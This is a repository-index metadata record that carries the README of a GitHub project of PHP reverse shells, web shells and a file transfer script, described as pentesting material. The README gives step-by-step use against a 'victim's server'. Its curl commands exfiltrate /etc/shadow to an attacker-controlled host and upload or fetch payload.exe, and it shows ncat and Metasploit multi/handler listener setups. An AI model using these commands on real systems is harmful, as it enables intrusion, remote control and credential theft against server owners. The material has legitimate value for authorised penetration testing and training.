{"id":15374449,"url":"https://github.com/ivan-sincek/php-reverse-shell","last_synced_at":"2025-04-05T04:13:55.871Z","repository":{"id":37273305,"uuid":"279512984","full_name":"ivan-sincek/php-reverse-shell","owner":"ivan-sincek","description":"PHP shells that work on Linux OS, macOS, and Windows OS.","archived":false,"fork":false,"pushed_at":"2023-10-03T09:48:21.000Z","size":473,"stargazers_count":477,"open_issues_count":0,"forks_count":152,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-29T03:09:24.315Z","etag":null,"topics":["bind-shell","bind-tcp","ethical-hacking","linux","macos","networking","offensive-security","oscp","penetration-testing","php","red-team-engagement","reverse-shell","reverse-tcp","security","tcp","web","web-penetration-testing","web-shell","windows"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-07-14T07:22:54.000Z","updated_at":"2025-03-21T22:41:53.000Z","dependencies_parsed_at":"2024-10-16T14:01:14.878Z","dependency_job_id":"f5822d8b-8980-4e09-8241-a97a3448927f","html_url":"https://github.com/ivan-sincek/php-reverse-shell","commit_stats":{"total_commits":4,"total_committers":1,"mean_commits":4.0,"dds":0.0,"last_synced_commit":"9c5fc8326abc243a7b2591bf7b3691bf23960a8c"},"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fphp-reverse-shell","ta
gs_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fphp-reverse-shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fphp-reverse-shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fphp-reverse-shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/php-reverse-shell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247284951,"owners_count":20913704,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bind-shell","bind-tcp","ethical-hacking","linux","macos","networking","offensive-security","oscp","penetration-testing","php","red-team-engagement","reverse-shell","reverse-tcp","security","tcp","web","web-penetration-testing","web-shell","windows"],"created_at":"2024-10-01T13:58:49.169Z","updated_at":"2025-04-05T04:13:55.849Z","avatar_url":"https://github.com/ivan-sincek.png","language":"PHP","readme":"# PHP Reverse Shell\n\nJust a little refresh on the popular PHP reverse shell script [pentestmonkey/php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell). Credits to the original author!\n\nWorks on Linux OS and macOS with `/bin/sh` and Windows OS with `cmd.exe`. 
Script will automatically detect the underlying OS.\n\nWorks with both, `ncat` and `multi/handler`.\n\nTested on XAMPP for Linux v7.3.19 (64-bit) with PHP v7.3.19 on Kali Linux v2020.2 (64-bit).\n\nTested on XAMPP for OS X v7.4.10 (64-bit) with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit).\n\nTested on XAMPP for Windows v7.4.3 (64-bit) with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit).\n\nIn addition, everything was tested on Docker images [nouphet/docker-php4](https://hub.docker.com/r/nouphet/docker-php4) with PHP v4.4.0 and [steeze/php52-nginx](https://hub.docker.com/r/steeze/php52-nginx) with PHP v5.2.17.\n\nMade for educational purposes. I hope it will help!\n\n**Process pipes on Windows OS do not support asynchronous operations so `stream_set_blocking()`, `stream_select()`, and `feof()` will not work properly, but I found a workaround.**\n\n## Table of Contents\n\n* [Reverse Shells](#reverse-shells)\n* [Web Shells](#web-shells)\n* [File Upload/Download Script](#file-uploaddownload-script)\n\t* [Case 1: Upload the Script to the Victim’s Server](#case-1-upload-the-script-to-the-victims-server)\n\t* [Case 2: Upload the Script to Your Server](#case-2-upload-the-script-to-your-server)\n* [Set Up a Listener](#set-up-a-listener)\n* [Images](#images)\n\n## Reverse Shells\n\n[/src/reverse/php_reverse_shell.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php) requires PHP v5.0.0 or greater.\n\n[/src/reverse/php_reverse_shell_older.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell_older.php) requires PHP v4.3.0 or greater.\n\n**Change the IP address and port number inside the scripts as necessary.**\n\nCopy [/src/reverse/php_reverse_shell.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php) to your server's web root directory (e.g. 
to /opt/lampp/htdocs/ on XAMPP) or upload it to your target's web server.\n\nNavigate to the file with your preferred web browser.\n\n## Web Shells\n\nCheck the [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_post.php) based on HTTP POST request.\n\nCheck the [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get.php) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.\n\nCheck the [simple PHP web shell v2](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get_v2.php) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.\n\nFind out more about PHP obfuscation techniques for old versions of PHP at [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF). Credits to the author!\n\n## File Upload/Download Script\n\nCheck the [simple PHP file upload/download script](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/files.php) based on HTTP POST request for file upload and HTTP GET request for file download.\n\nWhen downloading a file, you must [URL encode](https://www.urlencoder.org) the file path, and don't forget to specify the output file if using cURL.\n\nWhen uploading a file, don't forget to specify `@` before the file path.\n\nDepending on the server configuration, downloading a file through HTTP GET request parameter might not always work; instead, you will have to hardcode the file path in the script.\n\n### Case 1: Upload the Script to the Victim’s Server\n\nNavigate to the script on the victim's web server with your preferred web browser, or use cURL from your PC.\n\nUpload a file to the server's web root directory from your PC:\n\n```fundamental\ncurl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe\n```\n\nDownload a file from the server to your 
PC:\n\n```fundamental\ncurl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow\n```\n\nIf you elevated your initial privileges within your reverse shell, this script might not have the same privileges as the shell. In that case, to download a certain file, you might need to copy the file to the web root directory and set the necessary read permissions.\n\n### Case 2: Upload the Script to Your Server\n\nFrom your PHP reverse shell, run the following cURL commands.\n\nUpload a file from the victim's PC to your server's web root directory:\n\n```fundamental\ncurl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow\n```\n\nDownload a file from your server's web root directory to the victim's PC:\n\n```fundamental\ncurl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe\n\ncurl -skL -X GET https://my-server.com/payload.exe -o payload.exe\n```\n\n## Set Up a Listener\n\nTo set up a listener, open your preferred console on Kali Linux and run one of the examples below.\n\nSet up `ncat` listener:\n\n```fundamental\nncat -nvlp 9000\n```\n\nSet up `multi/handler` listener:\n\n```fundamental\nmsfconsole -q\n\nuse exploit/multi/handler\n\nset PAYLOAD windows/shell_reverse_tcp\n\nset LHOST 192.168.8.185\n\nset LPORT 9000\n\nexploit\n```\n\n## Images\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/php-reverse-shell/blob/master/img/ncat.png\" alt=\"Ncat\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 1 - Ncat\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/php-reverse-shell/blob/master/img/scripts_dump.jpg\" alt=\"Script Dump\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 2 - Script's 
Dump\u003c/p\u003e\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fphp-reverse-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fphp-reverse-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fphp-reverse-shell/lists"}